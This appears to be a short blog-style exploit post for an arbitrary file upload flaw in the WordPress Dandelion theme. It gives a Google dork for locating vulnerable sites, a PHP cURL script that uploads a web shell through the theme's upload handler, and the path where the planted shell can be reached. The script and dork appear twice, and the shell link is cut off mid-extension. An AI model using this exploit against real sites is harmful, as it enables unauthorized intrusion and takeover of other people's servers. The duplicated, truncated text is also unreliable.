Exploit Title: Wordpress Dandelion Themes Arbitry File Upload
Google Dork: inurl:/wp-content/themes/dandelion/
Code==>
<?php
$uploadfile="yourshell.php";
$ch = curl_init("http://www.yourshell.com/wp-content/themes/dandelion/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
shell link=> http://www.yourshell.com/uploads/[years]/[month]/your_shell.ph
Google Dork: inurl:/wp-content/themes/dandelion/
Code==>
<?php
$uploadfile="yourshell.php";
$ch = curl_init("http://www.yourshell.com/wp-content/themes/dandelion/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
shell link=> http://www.yourshell.com/uploads/[years]/[month]/your_shell.ph
0 Komentar